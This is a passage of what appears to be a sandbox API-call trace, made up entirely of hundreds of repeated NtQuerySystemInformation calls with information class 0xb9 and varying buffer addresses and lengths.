(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe220, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x20, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x20, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe168, Length=0x28, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf90, Length=0x20, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf90, Length=0x20, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 